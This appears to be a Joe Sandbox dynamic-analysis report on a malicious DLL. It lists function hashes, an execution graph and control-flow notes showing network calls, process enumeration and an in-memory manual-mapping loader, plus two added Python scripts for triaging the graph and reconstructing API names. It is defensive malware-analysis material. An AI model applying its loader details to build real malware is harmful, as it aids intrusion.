                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: R$)H8$?rIc$L==$V
                                                                                                                                • API String ID: 0-2512384441
                                                                                                                                • Opcode ID: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                                                                                • Instruction ID: 6f6f9af97a41f07aad9f9d1cbd67af5334817a93c453241fb2a5d498ae2065c2
                                                                                                                                • Opcode Fuzzy Hash: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                                                                                • Instruction Fuzzy Hash: 3541D0B090074E8BCF48CF64D49A5DE7FB0FB68398F20421DE856A6250D3B896A5CFC5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Qq$bt$vird$+$S
                                                                                                                                • API String ID: 0-3373980505
                                                                                                                                • Opcode ID: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                                                                                • Instruction ID: 8c34661c01ca41a1498f33dadfb9b2381b3c020394efcb6cfebc1cbd8490f91c
                                                                                                                                • Opcode Fuzzy Hash: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                                                                                • Instruction Fuzzy Hash: 8831C2B081038A8FDB45CF64C88A5DE7BF0FB58358F115A19F869A6250D3B4D668CF81
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: V$@$P9$^_"
                                                                                                                                • API String ID: 0-1880944046
                                                                                                                                • Opcode ID: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                                                                                • Instruction ID: ef3f81825b514374c5d287d432cdf068934c0dc0259921085eace1de493a05f6
                                                                                                                                • Opcode Fuzzy Hash: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                                                                                • Instruction Fuzzy Hash: B6F1DF70504749EFCB98CF28D18AACE7BE0FB48348F50812AF81A9B264D770DA59DB45
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: =_$F)k$b/$syG
                                                                                                                                • API String ID: 0-3955183656
                                                                                                                                • Opcode ID: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                                                                                • Instruction ID: 3a63fdd7148b145f5d2717dabea2a2fa508061acbcc25a132c341bfe6e9ad30f
                                                                                                                                • Opcode Fuzzy Hash: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                                                                                • Instruction Fuzzy Hash: DED12771A0478D8BCF59DFA8C88A6EEBBB0FB48344F10421DE846A7650D7B4D909CF85
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: #X$'Xsa$iJ6$vG
                                                                                                                                • API String ID: 0-746338152
                                                                                                                                • Opcode ID: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                                                                                • Instruction ID: 8ba50615c78112980223cca8f04f1fa67c4b69ee5a809e4e0bd2b8ae6832a1bb
                                                                                                                                • Opcode Fuzzy Hash: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                                                                                • Instruction Fuzzy Hash: 93E154B590070DDFCB88DF68D19A9DD7BB9BB49308F404029FC0E9A264D3B4E919CB56
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: *i^$MIC$-Z$]2
                                                                                                                                • API String ID: 0-498664264
                                                                                                                                • Opcode ID: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                                                                                • Instruction ID: 9792ecb135b2155067e966d5e38dbf4f409fde80c29e70d57d2078ebe1ce15c6
                                                                                                                                • Opcode Fuzzy Hash: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                                                                                • Instruction Fuzzy Hash: 10E1C670109B888FDBF8DF64CC86BEB7BA5FB44346F10651DD84A8A290DBB46645CF41
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: B$EG$QsF$_
                                                                                                                                • API String ID: 0-784369960
                                                                                                                                • Opcode ID: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                                                                                • Instruction ID: 62dbbc71664ee0946fffbba3b71afe09b12d9ffe0d1744d6deb9db65ff0cd9cc
                                                                                                                                • Opcode Fuzzy Hash: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                                                                                • Instruction Fuzzy Hash: 3FB1387010468D8FDF88DF28C88A6DA3FA1FB68388F614219FC4A97250C778D694CBC5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: -`G$.$5B.Y$Z`35
                                                                                                                                • API String ID: 0-1363032466
                                                                                                                                • Opcode ID: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                                                                                • Instruction ID: b244d414363a4385de25ad5610b22aaac7fb2f2c92cf8150697ad32e565f4bd8
                                                                                                                                • Opcode Fuzzy Hash: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                                                                                • Instruction Fuzzy Hash: 29A1FB716157888FEB7ADF24C89A7CE7BE1FB49308F40461DD98E8A250D7B49609CB42
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: *+_$WSh$\O$#o
                                                                                                                                • API String ID: 0-1846314129
                                                                                                                                • Opcode ID: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                                                                                • Instruction ID: 175ce4bc0e22c7a636d32034be2bbb8ad42f6b3cb6a748f64f507b7f0b29ed37
                                                                                                                                • Opcode Fuzzy Hash: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                                                                                • Instruction Fuzzy Hash: 1971167160474ECFCB98DF18C489ADA3BE1FB58318F414529FC09A7264DB74DAA8CB85
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: .B$O$M*K$\<
                                                                                                                                • API String ID: 0-3225238681
                                                                                                                                • Opcode ID: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                                                                                • Instruction ID: 95d2fbb8f7fe970b1359d27f41ccd6aad584115d4fee043204e0c0f4c3f3b287
                                                                                                                                • Opcode Fuzzy Hash: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                                                                                • Instruction Fuzzy Hash: 7181E370549788CFEBBACF24C886BDE7BE4FB48744F20461DE85A8A260DB709645CF41
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $$$$xVO$~O
                                                                                                                                • API String ID: 0-3655128719
                                                                                                                                • Opcode ID: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                                                                                • Instruction ID: 8f78542db34460f4381821bab2b7e4f68a699ed7f8b2fc47c959991f0b02677a
                                                                                                                                • Opcode Fuzzy Hash: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                                                                                • Instruction Fuzzy Hash: 5B61D1B05187448FD369DF28C18965BBBF1FBC6744F008A1EF6868A260DB76D948CB47
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
Yara matches
Similarity
• API ID:
• String ID: ,IW$G$JMg$l
• API String ID: 0-1370644289
• Opcode ID: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
• Instruction ID: 7fb8b97fd43ed4dc52a467cdcf5cca41e6e56dbc92574a5c866222c6b731b82a
• Opcode Fuzzy Hash: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
• Instruction Fuzzy Hash: 0A41D3B190074E8FCB48CF64C88A5DE7FB0FB18358F10461EE85AA6250D7B89695CFC9
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
Yara matches
Similarity
• API ID:
• String ID: ,$,$2S=$i`}G
• API String ID: 0-4285990414
• Opcode ID: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
• Instruction ID: 665cb0e6160ce90faac3fa7baf9a16caae401c848b442bb7533a8cc1fd62885f
• Opcode Fuzzy Hash: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
• Instruction Fuzzy Hash: 4D41E57051CB848FD7B4DF18D486BDABBE0FB98750F40495EE48DC3251DBB0A8858B86
Uniqueness
Uniqueness Score: -1.00%

Execution Graph

Execution Coverage:18.9%
Dynamic/Decrypted Code Coverage:100%
Signature Coverage:4.8%
Total number of Nodes:83
Total number of Limit Nodes:8
execution_graph (83 nodes, rendered here as call chains from each entry point down to the API-calling leaves; nodes without an API name are intermediate functions):
18001aca4 -> 18001ad22 -> 180012b50 -> 180012b8a -> 180012bfb InternetOpenW
                       -> 18000a4fc -> 18000a572 -> 18000a5f0 HttpOpenRequestW
                       -> 18001cec4 -> 18001cf4a -> 18001cfe2 InternetConnectW
                       -> 18001ba75
180015388 -> 1800227d4 -> 18002281d -> 18001c05c -> 18001c0af -> 18002ad58 -> 1800046a8 -> 1800046ec -> 180004945 Process32FirstW
                                                               -> 18001c2e1
                                    -> 18001c568 -> 18001c58a -> 180003598 -> 180003640 -> 18001ed50 -> 18001ed7a -> 18000fb00 -> 18000fb80 -> 18000fc15 CreateFileW
                                                               -> 18000ac48 -> 18000ac8e -> 18001ed50 CreateFileW
                                                               -> 180025dac -> 180025dde -> 180015e2c -> 180015ea5 -> 180015f3b CreateThread
                                                               -> 1800097c0 -> 1800097fc -> 18001ed50 CreateFileW
                                                               -> 18001c948
                                    -> 180017908 -> 180017932 -> 180015e2c CreateThread
                                                               -> 180017bcd
                                    -> 180024315 -> 1800153e3
180015e2c -> 180015ea5 -> 180015f3b CreateThread
18001496c -> 1800149ce -> 18000fb00 CreateFileW
                       -> 1800152ba
180024d80 -> 180024eed -> 180019a30 -> 180019aa4 -> 180019b2a GetVolumeInformationW
                       -> 1800250bd
18000fb00 -> 18000fb80 -> 18000fc15 CreateFileW
4f0000 -> 4f0183 -> 4f043e VirtualAlloc -> 4f0462 -> 4f0531 GetNativeSystemInfo -> 4f056d VirtualAlloc -> 4f058b -> 4f09d9 VirtualProtect (back to 4f058b)
                                                                                                                 -> 4f0a00 -> 4f0a56 RtlAddFunctionTable -> 4f0a7b
          (4f0462, 4f0531 and 4f0a00 also branch directly to 4f0a7b; 4f058b loops on itself)
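Joe Sandbox emits the execution graph as a flat token stream in which `<id> <address> [<ApiName>]` declares a node and `<src>-><dst>` declares an edge. The script below is an added example, not part of the report: it parses that stream and prints, for every entry point (a node with no incoming edge), the set of Windows APIs reachable from it, which is the quickest way to triage a large graph. The embedded sample is the two sub-graphs for 18001aca4 (rundll32) and 4f0000 (regsvr32) copied from this report's token stream; the grammar and the root/reachability interpretation are this example's own assumptions.

```python
"""Parse a Joe Sandbox `execution_graph` token stream and list, per entry
point, the Windows APIs that can be reached from it.

Grammar assumed from the report text (this example's assumption):
    <node-id> <address> [<ApiName>]   declares a node
    <src>-><dst>                      declares an edge
Added example; not code from Joe Sandbox.
"""
from collections import defaultdict

# Constructed input: two sub-graphs copied from the report's execution_graph
# line (the WinINet chain in rundll32 and the mapping stub at 4f0000).
SAMPLE = (
    "execution_graph "
    "3902 18001aca4 3907 18001ad22 3902->3907 3903 18001ba75 3907->3903 "
    "3908 180012b50 3907->3908 3911 18000a4fc 3907->3911 3914 18001cec4 3907->3914 "
    "3910 180012b8a 3908->3910 3909 180012bfb InternetOpenW 3909->3907 3910->3909 "
    "3913 18000a572 3911->3913 3912 18000a5f0 HttpOpenRequestW 3912->3907 3913->3912 "
    "3916 18001cf4a 3914->3916 3915 18001cfe2 InternetConnectW 3915->3907 3916->3915 "
    "3987 4f0000 3988 4f0183 3987->3988 3989 4f043e VirtualAlloc 3988->3989 "
    "3993 4f0462 3989->3993 3990 4f0a7b 3991 4f0531 GetNativeSystemInfo 3991->3990 "
    "3992 4f056d VirtualAlloc 3991->3992 3997 4f058b 3992->3997 3993->3990 3993->3991 "
    "3994 4f0a00 3994->3990 3995 4f0a56 RtlAddFunctionTable 3994->3995 3995->3990 "
    "3996 4f09d9 VirtualProtect 3996->3997 3997->3994 3997->3996 3997->3997"
)


def parse(text):
    """Return (nodes, edges): nodes maps id -> (address, api-or-None),
    edges maps src id -> set of dst ids."""
    tokens = text.split()
    if tokens and tokens[0] == "execution_graph":
        tokens = tokens[1:]
    nodes, edges = {}, defaultdict(set)
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if "->" in tok:                       # edge
            src, dst = tok.split("->")
            edges[src].add(dst)
            i += 1
        elif tok.isdigit():                   # node: id, address, optional API
            node_id, addr = tok, tokens[i + 1]
            api = None
            nxt = tokens[i + 2] if i + 2 < len(tokens) else ""
            if nxt and not nxt.isdigit() and "->" not in nxt:
                api = nxt
                i += 1
            nodes[node_id] = (addr, api)
            i += 2
        else:
            raise ValueError(f"unexpected token {tok!r} at position {i}")
    return nodes, edges


def reachable_apis(nodes, edges):
    """Map each root address (node with no incoming edge) to the set of API
    names reachable from it by following edges transitively."""
    has_parent = {d for dsts in edges.values() for d in dsts}
    result = {}
    for root in nodes:
        if root in has_parent:
            continue
        seen, stack, apis = set(), [root], set()
        while stack:                          # iterative DFS, cycle-safe
            n = stack.pop()
            if n in seen:
                continue
            seen.add(n)
            api = nodes[n][1]
            if api:
                apis.add(api)
            stack.extend(edges.get(n, ()))
        result.setdefault(nodes[root][0], set()).update(apis)
    return result


def summarize(text):
    nodes, edges = parse(text)
    return reachable_apis(nodes, edges)


if __name__ == "__main__":
    for addr, apis in summarize(SAMPLE).items():
        print(f"{addr}: {', '.join(sorted(apis)) or '(no API calls)'}")
```

Running it on the full 83-node line works the same way; the roots 180015e2c and 18000fb00 that the report lists twice simply show up as their own entries.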

Control-flow Graph

• Executed
• Not Executed
control_flow_graph (4f0000-4f0aa6; only the entry block, the exit block and blocks that call something are listed):
• Entry 4f0000-4f0460: call 4f0aa8 * 2, VirtualAlloc; then a chain of checks 4f048a-4f04f4, each of which branches to the exit block 4f0a91 on failure
• 4f0531-4f0567: GetNativeSystemInfo (to 4f0a91 on failure, else 4f056d)
• 4f056d-4f0589: VirtualAlloc
• 4f09d9-4f09e9: VirtualProtect (reached from 4f09c5-4f09d3, continues to 4f09ec-4f09fa)
• 4f0a56-4f0a79: RtlAddFunctionTable (reached from 4f0a4c-4f0a54, continues to 4f0a7b-4f0a8e)
• Exit 4f0a91-4f0aa6, entered from 4f0a7b-4f0a8e and from the failed checks above
• Self-looping blocks: 4f0468-4f0488, 4f05ec-4f0609, 4f0722-4f0784, 4f08ca-4f08d1
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.757827671.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4f0000_regsvr32.jbxd
Similarity
• API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
• String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
• API String ID: 394283112-2517549848
• Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
• Instruction ID: 275d8cc3aa0bbb33c166530e3b621a48d89386fa4ef8b27a7a29691bbd7e2bc7
• Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
• Instruction Fuzzy Hash: 7372D870518B4C8BDB19DF18C8856BAB7E1FB94305F10562EE9CBC7212DB38D546CB86
Uniqueness
Uniqueness Score: -1.00%
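Every `String ID` fragment of the 4f0000 function (`Cach$Find$Flus$Free$…`) is exactly four bytes long, which is consistent with a stub that builds its API names on the stack one DWORD at a time: the extractor's four-byte minimum keeps each full DWORD and drops the shorter tail of every name. The script below is an added example, not part of the report. It reassembles the fragments against a list of candidate API names and reports which fragments remain unexplained, so the analyst can see which imports the stub resolves without opening the dump. The candidate list, including FreeResource and the decoy names, is this example's assumption; the report supplies only the fragments.

```python
"""Reassemble Win32 API names from the 4-byte string fragments that Joe Sandbox
reports for the stub at 4f0000 (the `String ID` field). Added example, not
code from the report; the candidate names are this example's assumption.
"""
from __future__ import annotations
from collections import Counter

# Fragments exactly as printed in the report, '$'-separated.
REPORT_STRING_ID = (
    "Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$"
    "Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$"
    "sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce"
)

# Candidate names (assumption). First group: a typical manual-mapping plus
# resource-unpacking import set. Second group: decoys whose fragments are
# absent and must not be reported.
CANDIDATES = [
    "VirtualAlloc", "VirtualProtect", "GetNativeSystemInfo",
    "RtlAddFunctionTable", "FlushInstructionCache", "LoadLibraryA", "Sleep",
    "FindResource", "LoadResource", "LockResource", "SizeofResource",
    "FreeResource",
    # decoys
    "FreeLibrary", "VirtualFree", "GetProcAddress", "CreateFileW",
    "WriteProcessMemory",
]

FRAG = 4  # minimum string length used by the extractor


def fragments(name: str) -> list[str]:
    """Split a name into 4-byte chunks; a trailing chunk shorter than 4 bytes
    is dropped because the extractor would not have listed it."""
    chunks = [name[i:i + FRAG] for i in range(0, len(name), FRAG)]
    return [c for c in chunks if len(c) == FRAG]


def reassemble(string_id: str, candidates: list[str]) -> tuple[list[str], Counter]:
    """Greedily assign fragments to candidate names, honouring multiplicity.
    Names with more chunks are tried first so a long name is not starved of a
    shared chunk by a shorter one (LoadLibraryA vs. FreeLibrary both need
    'Libr'). Returns (matched names, leftover fragments with counts)."""
    pool = Counter(string_id.split("$"))
    matched = []
    for name in sorted(candidates, key=lambda n: (-len(fragments(n)), n)):
        need = Counter(fragments(name))
        if not need:                 # shorter than one chunk: nothing to match
            continue
        if all(pool[c] >= k for c, k in need.items()):
            pool -= need             # consume the fragments this name explains
            matched.append(name)
    return matched, +pool            # unary '+' drops zero counts


if __name__ == "__main__":
    names, leftover = reassemble(REPORT_STRING_ID, CANDIDATES)
    for n in names:
        print(f"{n:24s} <- {' '.join(fragments(n))}")
    print("unexplained fragments:", dict(leftover) or "none")
```

The greedy assignment is a heuristic, not a proof: a leftover list that is empty means the candidates fully explain the fragments, while a non-empty one points at names that still have to be guessed. With the report's fragments, the twelve names in the first group consume all 38 fragments and none of the decoys match.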

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000005.00000002.758543325.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: #X$Ec;$J$^c$^c$n
• API String ID: 0-2929744921
• Opcode ID: 4bf1a5684c4273f47db2f7bfe37ec9194a020a583a1b353a94edbff9173a6149
• Instruction ID: 2841c3f5e183e4376706155e5f630a85a86355917b0bfec54de2fd5c82beda78
• Opcode Fuzzy Hash: 4bf1a5684c4273f47db2f7bfe37ec9194a020a583a1b353a94edbff9173a6149
• Instruction Fuzzy Hash: DB0214705187C88BC798DFA8C48965EFBE1FB98744F108A1DF48687660DBF4D948CB42
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph (1800132f0-18001377d; only the entry block, the exit block and blocks that call something are listed):
• Entry 1800132f0-18001332a
• 18001334d-1800133c6: call 18001a754
• 1800133ec-1800134a8: call 180021434
• 1800134ae-1800135dc: call 180016428, call 180013e28
• 1800135f0-18001368c: call 180021434
• 1800136bc-180013757: call 180013e28
• Exit 180013763-18001377d, entered from 180013759-180013760 and 1800136bc-180013757
Strings
Memory Dump Source
• Source File: 00000005.00000002.758543325.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: =_$F)k$b/$syG
• API String ID: 0-3955183656
• Opcode ID: 78e362ff9fa706a76cdd339057cb87764c88e196f3f9d59d0d5946dc172ac972
• Instruction ID: 3a63fdd7148b145f5d2717dabea2a2fa508061acbcc25a132c341bfe6e9ad30f
• Opcode Fuzzy Hash: 78e362ff9fa706a76cdd339057cb87764c88e196f3f9d59d0d5946dc172ac972
• Instruction Fuzzy Hash: DED12771A0478D8BCF59DFA8C88A6EEBBB0FB48344F10421DE846A7650D7B4D909CF85
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000005.00000002.758543325.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: 5IF$P)#
• API String ID: 0-1025399686
• Opcode ID: f542572e4f2ff63548a52b2cdf5e12f4f3f89a6a74df4dd4d6ea84f2146f04ed
• Instruction ID: ff53fea05c8e9f3baddf865253a509f05c382ca6cc85a3c859ee45a04624b947
• Opcode Fuzzy Hash: f542572e4f2ff63548a52b2cdf5e12f4f3f89a6a74df4dd4d6ea84f2146f04ed
• Instruction Fuzzy Hash: 0B9182711197889FCBA9DF18C8857DEB7E0FB88744F90561DF84A8B260C7B4DA49CB42
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph (18001cec4-18001d01f):
• 18001cec4-18001cf6a: call 1800142a0; branches either to 18001cf6c-18001cfdc (call 18000dd70) or directly to 18001cfe2
• 18001cf6c-18001cfdc: call 18000dd70, then 18001cfe2
• 18001cfe2-18001d01f: InternetConnectW
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.758543325.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID: ConnectInternet
• String ID: :G?$C
• API String ID: 3050416762-1225920220
• Opcode ID: 76a7b635ccb7068e30ecf2b503a3beb8f1d88f81d4224a3a6f9b87d06452e60c
• Instruction ID: f2a8b8884ccc4c3404819a5ba5e10ed0cdd0f68caef2c301b3e7290f999a0a2a
• Opcode Fuzzy Hash: 76a7b635ccb7068e30ecf2b503a3beb8f1d88f81d4224a3a6f9b87d06452e60c
• Instruction Fuzzy Hash: 5941F67450CB888FD7A8DF18D0857AAB7E0FB98314F508A5EE8CDC7296DB749844CB46
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.758543325.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID: CreateFile
• String ID: gF\
• API String ID: 823142352-1982329323
• Opcode ID: 7df644aaf73cc9bcde4b6fb7fa72ed7f80eca5e2f74ec0139d961ef78fad827b
• Instruction ID: 218d4d5182cb26b0f36475523bc21bdebfc34a2f4da3002633262ff40041eb9b
• Opcode Fuzzy Hash: 7df644aaf73cc9bcde4b6fb7fa72ed7f80eca5e2f74ec0139d961ef78fad827b
• Instruction Fuzzy Hash: 1931697051C7848BD778DF28D48679ABBE0FB89304F10891EE88DC3352DB709885CB86
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.758543325.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID: HttpOpenRequest
• String ID: :G?
• API String ID: 1984915467-1508054202
• Opcode ID: 21630c4fbef06d8aacd4c702dff3e94d0932750c237c7792a79e645746d5d1eb
• Instruction ID: 60d2efcdc3634c8de813e735c521a1a1b2f1d3197bf379f764bafd55f5181dd8
